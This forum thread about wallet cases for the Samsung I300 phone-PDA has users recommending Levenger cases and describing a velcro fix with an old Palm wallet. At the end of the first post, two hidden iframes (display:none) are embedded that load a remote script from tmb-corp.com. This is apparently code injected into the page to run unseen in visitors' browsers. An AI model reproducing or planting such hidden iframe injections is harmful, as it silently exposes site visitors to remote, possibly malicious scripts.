+ Reply to Thread

Thread: 1300 Wallet

1300 Wallet

I am using the wallet case that came with the I300 which has the 3 credit card slots. Is this the same one that is sold as an accessory by Sprint and Samsung? Has anyone located a better or more functional wallet case (with more room for credit cards, money, etc). I was using the Palm Wallet with my m505 which worked great and am looking for something similiar. Any suggestions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Some of the nicest cases I've gotten for my Palms and ebooks have come from Levenger.com.

They have an outlet store in Delray Beach/Boca Raton, Florida which I'm planning to get to next month to try them out.

Check the two other threads posted near this one regarding cases. One deals with a universal case sold at Target and the other from a reputable manufacturer of unique cases for individual models.

The solution I came up with was to use my palm branded wallet which I used for my M505 and bought some strips of round 3/4" velco and put about 4 pieces on the phone and the wallet. The velcro pieces have adhesive that sticks well to the wallet and the phone. The phone sticks perfectly and will not fall out. The velco rounds do not interfere with the cradle. So now I have a wallet which hold my phone\pda, money and credit cards. It is a slight bit thick, but it consolidates everthing and fits well in most coat pockets. I am planning to go to Home Depot to get a hole plug to replace the antenna which according to other posts, can be removed with no problem.

P.S. This message board is great!